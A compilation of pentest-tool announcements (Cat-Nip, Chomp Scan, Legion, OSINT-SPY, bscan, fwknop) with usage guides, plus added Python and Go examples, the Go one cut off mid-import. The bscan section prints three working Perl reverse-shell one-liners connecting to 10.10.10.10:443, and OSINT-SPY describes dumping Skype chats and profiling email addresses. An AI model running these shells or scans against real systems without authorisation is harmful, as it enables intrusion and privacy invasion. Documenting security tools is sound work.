Cat-Nip – Automated Basic Pentest Tool (Designed For Kali Linux)

Cat-Nip Automated Basic Pentest Tool
This tool will make your basic pentesting tasks, like Information Gathering, Auditing, and Reporting, fully automatic.

Usage Guide

Download / Clone Cat-Nip
~# git clone https://github.com/baguswiratmaadi/catnip

Go inside the Cat-Nip dir
~# cd catnip

Give permission to Cat-Nip
~# chmod 777 catnip.sh

Run Cat-Nip
~# ./catnip.sh

Changelog
1.0 First Release

Pentest tools auto-executed with Cat-Nip:
  Whois Lookup
  DNSmap
  Nmap
  Dmitry
  Theharvester
  Load Balancing Detector
  SSLyze
  Automater
  Ua Tester
  Gobuster
  Grabber
  Parsero
  Uniscan
  And more tools soon

Screenshot
This is a preview of Cat-Nip: Tools Preview, Output Result, Report In HTML.

Disclaimer
Do not scan government and private IT objects without legal permission. Do at your own risk.

Download Catnip

Link: http://feedproxy.google.com/~r/PentestTools/~3/8By2_tKKSAQ/cat-nip-automated-basic-pentest-tool.html

Chomp Scan – A Scripted Pipeline Of Tools To Streamline The Bug Bounty/Penetration Test Reconnaissance Phase

A scripted pipeline of tools to simplify the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.

Scope

Chomp Scan is a Bash script that chains together the fastest and most effective tools (in my opinion/experience) for doing the long and sometimes tedious process of recon. No more looking for word lists and trying to remember when you started a scan and where the output is. Chomp Scan creates a timestamped output directory based on the search domain, e.g. example.com-21:38:15, and puts all tool output there, split into individual sub-directories as appropriate. Custom output directories are also supported via the -o flag.

New: Chomp Scan now integrates Notica, which allows you to receive a notification when the script finishes. Simply visit Notica and get a unique URL parameter. Pass the parameter to Chomp Scan via the -n flag, keep the Notica page open in a browser tab on your computer or phone, and you will receive a message when Chomp Scan has finished running. No more constantly checking/forgetting to check those long-running scans.

Chomp Scan runs in multiple modes. The primary one is using command-line arguments to select which scanning phases to use, which wordlists, etc. A guided interactive mode is available, as well as a non-interactive mode, useful if you do not want to deal with setting multiple arguments.

A list of interesting words is included, such as dev, test, uat, staging, etc., and domains containing those terms are flagged. This way you can focus on the interesting domains first if you wish. This list can be customized to suit your own needs, or replaced with a different file via the -X flag.

A blacklist file is included, to exclude certain domains from the results. However, it does not prevent those domains from being resolved, only from being used for port scanning and content discovery. It can be passed via the -b flag.

Chomp Scan supports limited canceling/skipping of tools by pressing Ctrl-c. This can sometimes have unintended side effects, so use with care.

Note: Chomp Scan is in active development, and new/different tools will be added as I come across them. Pull requests and comments welcome!

Scanning Phases

Subdomain Discovery (3 different sized wordlists)
  dnscan
  subfinder
  sublist3r
  massdns + altdns

Screenshots (optional)
  aquatone

Port Scanning (optional)
  masscan and/or nmap
  nmap output styled with nmap-bootstrap-xsl

Information Gathering (optional) (4 different sized wordlists)
  subjack
  bfac
  whatweb
  wafw00f
  nikto

Content Discovery (optional) (4 different sized wordlists)
  ffuf
  gobuster
  dirsearch

Wordlists

A variety of wordlists are used, both for subdomain bruteforcing and content discovery. Daniel Miessler's Seclists are used heavily, as well as Jason Haddix's lists. Different wordlists can be used by passing in a custom wordlist or using one of the built-in named argument lists below.

Subdomain Bruteforcing
Argument Name | Filename | Word Count | Description
short | subdomains-top1mil-20000.txt | 22k | From Seclists
long | sortedcombined-knock-dnsrecon-fierce-reconng.txt | 102k | From Seclists
huge | huge-200k.txt | 199k | Combination I made of various wordlists, including Seclists

Content Discovery
Argument Name | Filename | Word Count | Description
small | big.txt | 20k | From Seclists
medium | raft-large-combined.txt | 167k | Combination of the raft wordlists in Seclists
large | seclists-combined.txt | 215k | Larger combination of all the Discovery/DNS lists in Seclists
xl | haddix_content_discovery_all.txt | 373k | Jason Haddix's all content discovery list
xxl | haddix-seclists-combined.txt | 486k | Combination of the two previous lists

Misc.
altdns-words.txt - 240 words - Used for creating domain permutations for masscan to resolve. Borrowed from altdns.
interesting.txt - 43 words - A list I created of potentially interesting words appearing in domain names. Provide your own interesting words list with the -X flag.

Installation

Clone this repo and run the installer.sh script. Make sure to source ~/.profile after running the installer in order to add the Go binary path to your $PATH variable. Then run Chomp Scan.

Usage

Chomp Scan always runs subdomain enumeration, thus a domain is required via the -u flag. The domain should not contain a scheme, e.g. http:// or https://. By default, HTTPS is always used. This can be changed to HTTP by passing the -H flag. A wordlist is optional, and if one is not provided the built-in short list (20k words) is used.

Other scan phases are optional. Content discovery can take an optional wordlist, otherwise it defaults to the built-in short (22k words) list.

The final results of the scan are stored in two text files in the output directory. All unique domains that are found are stored in all_discovered_domains.txt, and all unique IPs that are discovered are stored in all_discovered_ips.txt.

chomp-scan.sh -u example.com -a -d short -cC large -p -o path/to/directory

Usage of Chomp Scan:
  -u domain (required) Domain name to scan. This should not include a scheme, e.g. https:// or http://.
  -d wordlist (optional) The wordlist to use for subdomain enumeration. Three built-in lists, short, long, and huge, can be used, as well as the path to a custom wordlist. The default is short.
  -c (optional) Enable content discovery phase. The wordlist for this option defaults to short if not provided.
  -C wordlist (optional) The wordlist to use for content discovery. Five built-in lists, small, medium, large, xl, and xxl, can be used, as well as the path to a custom wordlist. The default is small.
  -s (optional) Enable screenshots using Aquatone.
  -i (optional) Enable information gathering phase, using subjack, bfac, whatweb, wafw00f, and nikto.
  -p (optional) Enable portscanning phase, using masscan (run as root) and nmap.
  -I (optional) Enable interactive mode. This allows you to select certain tool options and inputs interactively. This cannot be run with -D.
  -D (optional) Enable default non-interactive mode. This mode uses pre-selected defaults and requires no user interaction or options. This cannot be run with -I. Options: Subdomain enumeration wordlist: short. Content discovery wordlist: small. Aquatone screenshots: yes. Portscanning: yes. Information gathering: yes. Domains to scan: all unique discovered.
  -b wordlist (optional) Set custom domain blacklist file.
  -X wordlist (optional) Set custom interesting word list.
  -o directory (optional) Set custom output directory. It must exist and be writable.
  -a (optional) Use all unique discovered domains for scans, rather than interesting domains. This cannot be used with -A.
  -A (optional, default) Use only interesting discovered domains for scans, rather than all discovered domains. This cannot be used with -a.
  -H (optional) Use HTTP for connecting to sites instead of HTTPS.
  -h (optional) Display this help page.

In The Future

Chomp Scan is still in active development, as I use it myself for bug hunting, so I intend to continue adding new features and tools as I come across them. New tool suggestions, feedback, and pull requests are all welcomed. Here is a short list of potential additions I'm considering:
  Adding a config file, for more granular customization of tools and parameters
  Adding testing/support for Ubuntu/Debian
  A possible Python re-write (and maybe a Go re-write after that!)
  The generation of an HTML report, similar to what aquatone provides

Examples

Download Chomp-Scan
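How the -X interesting-word list, the -b blacklist and the -a/-A switch combine to decide which discovered domains reach the port scanning and content discovery phases, as an added Python example (not Chomp Scan's own Bash code). The domain list, word list and blacklist below are constructed stand-ins for the script's input files, and the substring-match rule for flagging is an assumption.

```python
"""Scope selection modelled on Chomp Scan's -X / -b / -a / -A semantics.

Added example, not part of Chomp Scan. Inputs are constructed stand-ins for
the files the script reads; the matching rule is an assumption.
"""
from datetime import datetime

# Constructed stand-in for the interesting-word list (-X). The shipped
# interesting.txt has 43 entries; these are a few of the same kind.
INTERESTING_WORDS = ["dev", "test", "uat", "staging", "admin"]
# Constructed stand-in for the blacklist file (-b).
BLACKLIST = ["cdn.example.com", "dev.example.com"]
# Constructed stand-in for all_discovered_domains.txt after resolution.
DISCOVERED = [
    "www.example.com",
    "dev.example.com",
    "cdn.example.com",
    "uat-api.example.com",
    "staging.example.com",
    "latest.example.com",   # "latest" contains "test": flagged by substring match
    "mail.example.com",
    "DEV.example.com",      # duplicate differing only in case
]


def output_dir_name(domain: str, when: datetime) -> str:
    """Timestamped output directory name, e.g. example.com-21:38:15."""
    return f"{domain}-{when.strftime('%H:%M:%S')}"


def is_interesting(domain: str, words) -> bool:
    """Flag a domain when any interesting word occurs anywhere in its name.

    Substring matching (an assumption about the script's rule) catches
    'uat-api' for 'uat' but also 'latest' for 'test'. The flag is only a
    prioritisation hint, so a false positive costs review time, not coverage.
    """
    name = domain.lower()
    return any(w in name for w in words)


def select_scan_targets(discovered, interesting_words, blacklist, use_all=False):
    """Return (flagged, targets).

    flagged: discovered domains containing an interesting word.
    targets: domains handed to port scanning and content discovery. The
             blacklist only bites here: blacklisted names still appear in the
             discovered set (they were resolved), they are just never scanned.
             use_all=False is the -A default (interesting domains only);
             use_all=True is -a (every non-blacklisted domain).
    """
    unique = sorted({d.strip().lower() for d in discovered if d.strip()})
    denied = {b.strip().lower() for b in blacklist if b.strip()}
    flagged = [d for d in unique if is_interesting(d, interesting_words)]
    pool = unique if use_all else flagged
    targets = [d for d in pool if d not in denied]
    return flagged, targets


if __name__ == "__main__":
    flagged, targets = select_scan_targets(DISCOVERED, INTERESTING_WORDS, BLACKLIST)
    print("flagged for review:", flagged)
    print("scan targets (-A):", targets)
    print("scan targets (-a):",
          select_scan_targets(DISCOVERED, INTERESTING_WORDS, BLACKLIST, use_all=True)[1])
    print("output directory:", output_dir_name("example.com", datetime(2019, 3, 1, 21, 38, 15)))
```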

Link: http://www.kitploit.com/2019/03/chomp-scan-scripted-pipeline-of-tools.html

Legion – An Easy-To-Use, Super-Extensible And Semi-Automated Network Penetration Testing Tool That Aids In Discovery, Reconnaissance And Exploitation Of Information Systems

Legion, a fork of SECFORCE's Sparta, is an open source, easy-to-use, super-extensible and semi-automated network penetration testing framework that aids in discovery, reconnaissance and exploitation of information systems. Legion is developed and maintained by GoVanguard. More information about Legion, including the product roadmap, can be found on its product page at https://GoVanguard.io/legion.

FEATURES
  Automatic recon and scanning with NMAP, whatweb, nikto, Vulners, Hydra, SMBenum, dirbuster, sslyzer, webslayer and more (with almost 100 auto-scheduled scripts)
  Easy to use graphical interface with rich context menus and panels that allow pentesters to quickly find and exploit attack vectors on hosts
  Modular functionality allows users to easily customize Legion and automatically call their own scripts/tools
  Highly customizable stage scanning for ninja-like IPS evasion
  Automatic detection of CPEs (Common Platform Enumeration) and CVEs (Common Vulnerabilities and Exposures)
  Realtime autosaving of project results and tasks

NOTABLE CHANGES FROM SPARTA
  Refactored from Python 2.7 to Python 3.6 and the elimination of deprecated and unmaintained libraries
  Upgraded to PyQT5, increased responsiveness, less buggy, more intuitive GUI that includes features like:
    Task completion estimates
    1-Click scan lists of ips, hostnames and CIDR subnets
    Ability to purge results, rescan hosts and delete hosts
    Granular NMAP scanning options
    Support for hostname resolution and scanning of vhosts/sni hosts
  Revised process queuing and execution routines for increased app reliability and performance
  Simplification of installation with dependency resolution and installation routines
  Realtime project autosaving so in the event something goes wrong, you will not lose any progress!
  Docker container deployment option
  Supported by a highly active development team

GIF DEMO

INSTALLATION

TRADITIONAL METHOD
Assumes Ubuntu, Kali or Parrot Linux is being used with Python 3.6 installed. Other dependencies should automatically be installed. Within Terminal:
git clone https://github.com/GoVanguard/legion.git
cd legion
sudo chmod +x startLegion.sh
sudo ./startLegion.sh

DOCKER METHOD
Assumes Docker and Xauthority are installed. Within Terminal:
git clone https://github.com/GoVanguard/legion.git
cd legion/docker
sudo chmod +x runIt.sh
sudo ./runIt.sh

ATTRIBUTION
  Refactored Python 3.6+ codebase, added feature set and ongoing development of Legion is credited to GoVanguard
  The initial Sparta Python 2.7 codebase and application design is credited to SECFORCE.
  Several additional PortActions, PortTerminalActions and SchedulerSettings are credited to batmancrew.
  The nmap XML output parsing engine was largely based on code by yunshu, modified by ketchup and modified by SECFORCE.
  ms08-067_check script used by smbenum.sh is credited to Bernardo Damele A.G.
  Legion relies heavily on nmap, hydra, python, PyQt, SQLAlchemy and many other tools and technologies, so we would like to thank all of the people involved in the creation of those.

Download Legion

Link: http://feedproxy.google.com/~r/PentestTools/~3/jDSvXwEafjY/legion-easy-to-use-super-extensible-and.html

OSINT-SPY – Search using OSINT (Open Source Intelligence)

Performs OSINT scan on email/domain/ip_address/organization using OSINT-SPY. It can be used by Data Miners, Infosec Researchers, Penetration Testers and cyber crime investigators in order to find deep information about their target.

OSINT-SPY Documentation (beta)
File Name : README
Author : @sk_security
Version : 0.0.1
Website : osint-spy.com

Overview of this tool:
  Perform scan on IP Address / domain / email address / BTC (bitcoin) address / device
  Find out latest bitcoin block information
  List out all the ciphers supported by a particular website and server
  Check whether a particular website is vulnerable to heartbleed or not
  Dump all the contacts and messages from skype database
  Analyze malware or malicious file remotely

Licenses information
OSINT-SPY and its documents are covered with GPL-3.0 (General Public License v3.0)

Using OSINT-SPY

Search using OSINT
Website: www.osint-spy.com

Usage: osint-spy.py [options]

Options:
  -h, --help      show this help message and exit.
  --btc_block     Find latest Bitcoin blockchain info.
  --btc_date      Find Bitcoin blockchain information from given date.
  --btc_address   Find out balance and transaction information of given bitcoin address.
  --ssl_cipher    List out all the ciphers used by given server.
  --ssl_bleed     Check whether server is vulnerable to heart bleed flaw or not.
  --domain        Get bunch of detail of given website or organization.
  --email         Gather information of a given email address.
  --device        Find out devices which are connected to internet.
  --ip            Enumerate information from given IP Address.
  --skype_db      Give the location of skype database in order to fetch all the information from that including chats and contacts.
  --malware       Find out whether a given file is infected by malware or not.
  --carrier       Give path of carrier file behind which you want to add text.
  --stego_text    Enter text to hide behind carrier file.
  --stego_find    Give a stego file and it will try to find hidden text.

Required setup
  Python 2.7
  Use install_linux.py (for installing all dependencies and libraries on linux)
  Use install_windows.py (for installing all dependencies and libraries on windows)

Contributors
1. Sharad Kumar - @sk_security

Documentation

Setting up the environment
Installing and using OSINT-SPY is very easy. The installation process is very simple and consists of 4 steps.
1. Downloading or cloning the OSINT-SPY github repository.
2. Downloading and installing all dependencies.
3. Generating API Keys
4. Adding API Keys in config file

Let's Begin !!

Step 1 - Download OSINT-SPY on your system.
In order to install OSINT-SPY simply clone the github repository. Below is the command which you can use in order to clone the OSINT-SPY repository.
git clone https://github.com/SharadKumar97/OSINT-SPY.git

Step 2 - Downloading and Installing dependencies.
Once you clone OSINT-SPY, you will find one directory named OSINT-SPY. Just go to that directory and install dependencies. If you are using OSINT-SPY on windows then run the install_windows.py file, and if you are using linux then run install_linux.py:
python install_linux.py
OR
python install_windows.py

Generating API Keys
We need some API Keys before using this tool. Following are the APIs which we are using in this tool for the time being.
1. Clearbit API
2. Shodan API
3. Fullcontact API
4. Virus_Total API
5. EmailHunter API

Clearbit API
Register yourself at Clearbit and activate your account. Once you login, you will find one section of API. Go there and copy your secret API Key and paste it inside the config.py file. The config.py file can be found in the modules directory of OSINT-SPY.

Shodan API
Register yourself at Shodan and activate your account. Once you have activated your account, login to Shodan. Once you login, you will find an API key in the overview tab. Copy that key and paste it inside the config.py file.

FullContact API
Register yourself at Full Contact. You can sign up by using your email or you can Sign Up with Google. Once you login, you will find your API Key on the front of your dashboard. Just copy that key and paste it inside the config.py file.

VirusTotal API
Register yourself at VirusTotal. Once you login, you will find the My Api Key section in your profile menu. Just go there and copy your public API Key and paste it in the config.py file.

EmailHunter API
Register yourself at Email Hunter. Once you login, go to the API tab and click on the EYE icon to view your API Key. Copy your API Key into the config.py file.

Usage
OSINT-SPY is a very handy tool and easy to use. All you have to do is pass values to the parameters. In order to start OSINT-SPY just write: python osint-spy.py

--btc_block
The --btc_block parameter gives you the information of the latest bitcoin block chain.
Usage: python osint-spy.py --btc_block

--btc_date
The --btc_date parameter will give you information of the bitcoin block chain from a given date.
Usage: python osint-spy.py --btc_date 20170620

--btc_address
--btc_address will give you information about a particular bitcoin owner.
python osint-spy.py --btc_address 1DST3gm6JthxhuoNKFqXrdpzPFfz1WgHpW

--ssl_cipher
--ssl_cipher will show you all the ciphers supported by a given website.
python osint-spy.py --ssl_cipher google.com

--ssl_bleed
--ssl_bleed will find out whether a given website is vulnerable to heartbleed or not.
python osint-spy.py --ssl_bleed google.com

--domain
--domain will give you in-depth information about a particular domain including whois, dns, ciphers, location and more.
python osint-spy.py --domain google.com

--email
--email will gather information about a given email address from various public sources.
python osint-spy.py --email david@toorcon.org

--device
--device will search for a given device on shodan and will list out all the available devices on public IPs.
python osint-spy.py --device webcam

--ip
--ip will gather all the information of a given IP Address from public sources.
python osint-spy.py --ip 127.0.0.1

--skype_db
--skype_db will find out all the contacts and message history from a given skype database. This can be useful for forensics investigators. In Windows, the Skype database can be found in AppData\Roaming\Skype\(Your username)\main.db and in Mac OSX, the database can be found in /Users/(Your mac user name)/Library/Support/Skype/(your skype username)/main.db
python osint-spy.py --skype_db main.db

--malware
--malware will send a given file to virustotal and will give you a result whether the given file is malware or not.
python osint-spy.py --malware abc.exe

--carrier and --stego_text
--carrier and --stego_text are used to hide text behind any image. --carrier will specify the image behind which you want to hide the text. --stego_text will specify the text you want to add.
python osint-spy.py --carrier image.jpg --stego_text This_is_secre_text

--stego_find
--stego_find will find out hidden text behind any image.
python osint-spy.py --stego_find hidden.jpg

Download OSINT-SPY

Link: http://feedproxy.google.com/~r/PentestTools/~3/-x63Tn8Ij2w/osint-spy-search-using-osint-open.html

Bscan – An Asynchronous Target Enumeration Tool

Synopsis

bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation

bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.

Download the latest packaged version from PyPI:
pip install bscan

Or get the bleeding-edge version from version control:
pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage

bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:
$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org

What's going on here?
  --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
  --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
  --status-interval 10 tells bscan to print runtime status updates every 10 seconds
  --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
  scanme.nmap.org is the host upon which we want to enumerate

bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory and serve the following purposes:
  patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
  required-programs.txt specifies the installed programs that bscan plans on using
  port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
  service-scans.toml defines the scans to be run on the target(s) on a per-service basis

Detailed Options

Here's what you should see when running bscan --help:

usage: bscan [OPTIONS] targets

an asynchronous service enumeration tool

positional arguments:
  targets               the targets and/or networks on which to perform enumeration

optional arguments:
  -h, --help            show this help message and exit
  --brute-pass-list F   filename of password list to use for brute-forcing
  --brute-user-list F   filename of user list to use for brute-forcing
  --cmd-print-width I   the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80)
  --config-dir D        the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program
  --hard                force overwrite of existing directories
  --max-concurrency I   maximum integer number of subprocesses permitted to be running concurrently (defaults to 20)
  --no-program-check    disable checking the presence of required system programs
  --no-file-check       disable checking the presence of files such as configured wordlists
  --no-service-scans    disable running scans on discovered services
  --output-dir D        the base directory in which to write output files
  --patterns [ [ ...]]  regex patterns to highlight in output text
  --ping-sweep          enable ping sweep filtering of hosts from a network range before running more intensive scans
  --quick-only          whether to only run the quick scan (and not include the thorough scan over all ports)
  --qs-method S         the method for performing the initial TCP port scan; must correspond to a configured port scan
  --status-interval I   integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30)
  --ts-method S         the method for performing the thorough TCP port scan; must correspond to a configured port scan
  --udp                 whether to run UDP scans
  --udp-method S        the method for performing the UDP port scan; must correspond to a configured port scan
  --verbose-status      whether to print verbose runtime status updates, based on frequency specified by `--status-interval` flag
  --version             program version
  --web-word-list F     the wordlist to use for scans

Companion Tools

The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.

bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:
$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt
Try bscan-wordlists --help to explore other options.

bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:
$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development

Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):
# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev
# get the deps
pip install -r dev-requirements.txt

Lint and type-check the project (these are run on Travis, too):
flake8 . && mypy bscan

When it's time to package a new release:
# build source and wheel distributions
python setup.py bdist_wheel sdist
# run post-build checks
twine check dist/*
# upload to PyPI
twine upload dist/*

Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Fwknop – Single Packet Authorization & Port Knocking

fwknop implements an authorization scheme known as Single Packet Authorization (SPA) for strong service concealment. SPA requires only a single packet which is encrypted, non-replayable, and authenticated via an HMAC in order to communicate desired access to a service that is hidden behind a firewall in a default-drop filtering stance. The main application of SPA is to use a firewall to drop all attempts to connect to services such as SSH in order to make the exploitation of vulnerabilities (both 0-day and unpatched code) more difficult. Because there are no open ports, any service that is concealed by SPA naturally cannot be scanned for with Nmap. The fwknop project supports four different firewalls: iptables, firewalld, PF, and ipfw across Linux, OpenBSD, FreeBSD, and Mac OS X. There is also support for custom scripts so that fwknop can be made to support other infrastructure such as ipset or nftables.

SPA is essentially next generation Port Knocking (PK), but solves many of the limitations exhibited by PK while retaining its core benefits. PK limitations include a general difficulty in protecting against replay attacks, asymmetric ciphers and HMAC schemes are not usually possible to reliably support, and it is trivially easy to mount a DoS attack against a PK server just by spoofing an additional packet into a PK sequence as it traverses the network (thereby convincing the PK server that the client doesn't know the proper sequence). All of these shortcomings are solved by SPA. At the same time, SPA hides services behind a default-drop firewall policy, acquires SPA data passively (usually via libpcap or other means), and implements standard cryptographic operations for SPA packet authentication and encryption/decryption.

SPA packets generated by fwknop leverage HMAC for authenticated encryption in the encrypt-then-authenticate model. Although the usage of an HMAC is currently optional (enabled via the --use-hmac command line switch), it is highly recommended for three reasons:
  1. Without an HMAC, cryptographically strong authentication is not possible with fwknop unless GnuPG is used, but even then an HMAC should still be applied.
  2. An HMAC applied after encryption protects against cryptanalytic CBC-mode padding oracle attacks such as the Vaudenay attack and related trickery (like the more recent "Lucky 13" attack against SSL).
  3. The code required by the fwknopd daemon to verify an HMAC is much more simplistic than the code required to decrypt an SPA packet, so an SPA packet without a proper HMAC isn't even sent through the decryption routines.

The final reason above is why an HMAC should still be used even when SPA packets are encrypted with GnuPG, due to the fact that SPA data is not sent through libgpgme functions unless the HMAC checks out first. GnuPG and libgpgme are relatively complex bodies of code, and therefore limiting the ability of a potential attacker to interact with this code through an HMAC operation helps to maintain a stronger security stance. Generating an HMAC for SPA communications requires a dedicated key in addition to the normal encryption key, and both can be generated with the --key-gen option.

fwknop encrypts SPA packets either with the Rijndael block cipher or via GnuPG and associated asymmetric cipher. If the symmetric encryption method is chosen, then as usual the encryption key is shared between the client and server (see the /etc/fwknop/access.conf file for details). The actual encryption key used for Rijndael encryption is generated via the standard PBKDF1 key derivation algorithm, and CBC mode is set. If the GnuPG method is chosen, then the encryption keys are derived from GnuPG key rings.

Use Cases

People who use Single Packet Authorization (SPA) or its security-challenged cousin Port Knocking (PK) usually access SSHD running on the same system where the SPA/PK software is deployed. That is, a firewall running on a host has a default-drop policy against all incoming SSH connections so that SSHD cannot be scanned, but a SPA daemon reconfigures the firewall to temporarily grant access to a passively authenticated SPA client:
"Basic SPA usage to access SSHD"

fwknop supports the above, but also goes much further and makes robust usage of NAT (for iptables/firewalld firewalls). After all, important firewalls are usually gateways between networks as opposed to just being deployed on standalone hosts. NAT is commonly used on such firewalls (at least for IPv4 communications) to provide Internet access to internal networks that are on RFC 1918 address space, and also to allow external hosts access to services hosted on internal systems.

Because fwknop integrates with NAT, SPA can be leveraged to access internal services through the firewall by users on the external Internet. Although this has plenty of applications on modern traditional networks, it also allows fwknop to support cloud computing environments such as Amazon's AWS:
"SPA usage on Amazon AWS cloud environments"

User Interface

The official cross-platform fwknop client user interface fwknop-gui (download, github) is developed by Jonathan Bennett. Most major client-side SPA modes are supported including NAT requests, HMAC and Rijndael keys (GnuPG is not yet supported), fwknoprc stanza saving, and more. Currently fwknop-gui runs on Linux, Mac OS X, and Windows. Here is a screenshot from OS X:
"fwknop-gui on Mac OS X"
Similarly, an updated Android client is available as well.

Tutorial

A comprehensive tutorial on fwknop can be found here: http://www.cipherdyne.org/fwknop/docs/fwknop-tutorial.html

Features

The following is a complete list of features supported by the fwknop project:
  Implements Single Packet Authorization around iptables and firewalld firewalls on Linux, ipfw firewalls on *BSD and Mac OS X, and PF on OpenBSD.
  The fwknop client runs on Linux, Mac OS X, *BSD, and Windows under Cygwin. In addition, there is an Android app to generate SPA packets.
  Supports both Rijndael and GnuPG methods for the encryption/decryption of SPA packets.
  Supports HMAC authenticated encryption for both Rijndael and GnuPG. The order of operation is encrypt-then-authenticate to avoid various cryptanalytic problems.
  Replay attacks are detected and thwarted by SHA-256 digest comparison of valid incoming SPA packets. Other digest algorithms are also supported, but SHA-256 is the default.
  SPA packets are passively sniffed from the wire via libpcap. The fwknopd server can also acquire packet data from a file that is written to by a separate Ethernet sniffer (such as with tcpdump -w ), from the iptables ULOG pcap writer, or directly via a UDP socket in --udp-server mode.
  For iptables firewalls, ACCEPT rules added by fwknop are added and deleted (after a configurable timeout) from custom iptables chains so that fwknop does not interfere with any existing iptables policy that may already be loaded on the system.
  Supports inbound NAT connections for authenticated SPA communications (iptables firewalls only for now). This means fwknop can be configured to create DNAT rules so that you can reach a service (such as SSH) running on an internal system on an RFC 1918 IP address from the open Internet. SNAT rules are also supported, which essentially turns fwknopd into a SPA-authenticating gateway to access the Internet from an internal network.
  Multiple users are supported by the fwknop server, and each user can be assigned their own symmetric or asymmetric encryption key via the /etc/fwknop/access.conf file.
  Automatic resolution of external IP address via https://www.cipherdyne.org/cgi-bin/myip (this is useful when the fwknop client is run from behind a NAT device). Because the external IP address is encrypted within each SPA packet in this mode, Man-in-the-Middle (MITM) attacks where an inline device intercepts an SPA packet and only forwards it from a different IP in an effort to gain access are thwarted.
  Port randomization is supported for the destination port of SPA packets as well as the port over which the follow-on connection is made via the iptables NAT capabilities. The latter applies to forwarded connections to internal services and to access granted to local sockets on the system running fwknopd.
  Integration with Tor (as described in this DefCon 14 presentation). Note that because Tor uses TCP for transport, sending SPA packets through the Tor network requires that each SPA packet is sent over an established TCP connection, so technically this breaks the "single" aspect of "Single Packet Authorization". However, Tor provides anonymity benefits that can outweigh this consideration in some deployments.
  Implements a versioned protocol for SPA communications, so it is easy to extend the protocol to offer new SPA message types and maintain backwards compatibility with older fwknop clients at the same time.
  Supports the execution of shell commands on behalf of valid SPA packets.
  The fwknop server can be configured to place multiple restrictions on inbound SPA packets beyond those enforced by encryption keys and replay attack detection. Namely, packet age, source IP address, remote user, access to requested ports, and more.
  Bundled with fwknop is a comprehensive test suite that issues a series of tests designed to verify that both the client and server pieces of fwknop work properly. These tests involve sniffing SPA packets over the local loopback interface, building temporary firewall rules that are checked for the appropriate access based on the testing config, and parsing output from both the fwknop client and fwknopd server for expected markers for each test. Test suite output can easily be anonymized for communication to third parties for analysis.
  fwknop was the first program to integrate port knocking with passive OS fingerprinting. However, Single Packet Authorization offers many security benefits beyond port knocking, so the port knocking mode of operation is generally deprecated.

Building fwknop

This distribution uses GNU autoconf for setting up the build. Please see the INSTALL file for the general basics on using autoconf.

There are some "configure" options that are specific to fwknop. They are (extracted from ./configure --help):
  --disable-client    Do not build the fwknop client component. The default is to build the client.
  --disable-server    Do not build the fwknop server component. The default is to build the server.
–with-gpgme support for gpg encryption using libgpgme [default=check] –with-gpgme-prefix=PFX prefix where GPGME is installed (optional) –with-gpg=/path/to/gpg Specify path to the gpg executable that gpgme will use [default=check path] –with-firewalld=/path/to/firewalld Specify path to the firewalld executable [default=check path] –with-iptables=/path/to/iptables Specify path to the iptables executable [default=check path] –with-ipfw=/path/to/ipfw Specify path to the ipfw executable [default=check path] –with-pf=/path/to/pfctl Specify path to the pf executable [default=check path] –with-ipf=/path/to/ipf Specify path to the ipf executable [default=check path]Examples:./configure –disable-client –with-firewalld=/bin/firewall-cmd./configure –disable-client –with-iptables=/sbin/iptables –with-firewalld=noDownload Fwknop
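The HMAC, replay-detection and packet-restriction features in the list above are easiest to understand as code. The Go program below is an added example written for this page; it is not fwknop's code and does not reproduce fwknop's real SPA message format, key derivation or access.conf handling. The message layout "unixtime:allow_ip:proto/port", the fixed demo keys and the 120-second age limit are assumptions made for the demo. It builds an SPA-style packet as AES-256-CBC followed by HMAC-SHA256 over IV||ciphertext, then verifies it in the order the feature list describes: HMAC first, then a SHA-256 digest check against a replay cache, then decryption and the age/port policy, granting access to the address carried inside the packet rather than to the observed source.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
	"strconv"
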